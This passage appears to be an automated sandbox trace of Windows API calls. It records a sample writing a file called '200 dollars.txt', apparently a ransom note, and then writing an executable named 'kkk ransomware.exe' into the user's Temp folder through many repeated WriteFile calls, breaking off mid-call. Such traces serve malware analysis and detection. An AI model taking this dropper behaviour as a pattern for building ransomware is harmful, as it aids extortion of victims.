returned 1 [0061.849] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt", nBufferLength=0x105, lpBuffer=0x6fd540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt", lpFilePart=0x0) returned 0x32 [0061.849] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt", nBufferLength=0x105, lpBuffer=0x6fd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt", lpFilePart=0x0) returned 0x32 [0061.849] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt", nBufferLength=0x105, lpBuffer=0x6fd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt", lpFilePart=0x0) returned 0x32 [0061.849] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt", nBufferLength=0x105, lpBuffer=0x6fd370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt", lpFilePart=0x0) returned 0x32 [0061.849] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt", nBufferLength=0x105, lpBuffer=0x6fd490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt", lpFilePart=0x0) returned 0x32 [0061.849] SetErrorMode (uMode=0x1) returned 0x0 [0061.849] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\200 dollars.txt"), fInfoLevelId=0x0, lpFileInformation=0x6fd6a0 | out: lpFileInformation=0x6fd6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0061.849] SetErrorMode (uMode=0x0) returned 0x1 [0061.850] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt", nBufferLength=0x105, lpBuffer=0x6fd070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt", lpFilePart=0x0) returned 0x32 [0061.850] SetErrorMode (uMode=0x1) returned 0x0 [0061.850] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\200 dollars.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2fc [0061.946] GetFileType (hFile=0x2fc) returned 0x1 [0061.946] SetErrorMode (uMode=0x0) returned 0x1 [0061.946] GetFileType (hFile=0x2fc) returned 0x1 [0061.957] WriteFile (in: hFile=0x2fc, lpBuffer=0x28306e0*, nNumberOfBytesToWrite=0x33a, lpNumberOfBytesWritten=0x6fd848, lpOverlapped=0x0 | out: lpBuffer=0x28306e0*, lpNumberOfBytesWritten=0x6fd848*=0x33a, lpOverlapped=0x0) returned 1 [0061.959] CloseHandle (hObject=0x2fc) returned 1 [0061.973] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", nBufferLength=0x105, lpBuffer=0x6fd540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", lpFilePart=0x0) returned 0x35 [0061.973] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", nBufferLength=0x105, lpBuffer=0x6fd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", lpFilePart=0x0) returned 0x35 [0061.973] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", nBufferLength=0x105, lpBuffer=0x6fd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", lpFilePart=0x0) returned 0x35 [0061.974] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", nBufferLength=0x105, lpBuffer=0x6fd370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", lpFilePart=0x0) returned 0x35 [0061.974] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", nBufferLength=0x105, lpBuffer=0x6fd490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", lpFilePart=0x0) returned 0x35 [0061.974] SetErrorMode (uMode=0x1) returned 0x0 [0061.974] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe"), fInfoLevelId=0x0, lpFileInformation=0x6fd6a0 | out: lpFileInformation=0x6fd6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0061.974] SetErrorMode (uMode=0x0) returned 0x1 [0061.974] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", nBufferLength=0x105, lpBuffer=0x6fd070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", lpFilePart=0x0) returned 0x35 [0061.974] SetErrorMode (uMode=0x1) returned 0x0 [0061.974] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2fc [0061.975] GetFileType (hFile=0x2fc) returned 0x1 [0061.975] SetErrorMode (uMode=0x0) returned 0x1 [0061.975] GetFileType (hFile=0x2fc) returned 0x1 [0061.977] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.118] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.118] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.118] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.119] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.119] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.119] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.119] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.120] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.120] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.120] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.120] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.121] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.121] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.121] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.121] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.121] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.122] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.122] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.122] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.122] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.123] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.123] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.123] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.123] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.124] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.124] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.124] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.124] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.125] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.125] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.125] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.125] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.126] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.126] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.126] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.126] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.126] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.127] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.127] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.127] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.127] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.128] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.128] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.128] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.128] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.129] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.129] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.129] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.129] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.130] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.130] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.130] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.130] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.130] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.131] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.131] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.131] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.131] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.132] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.132] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.132] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.132] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.132] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.133] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.134] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.134] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.134] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.134] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.134] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.135] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.135] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.135] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, 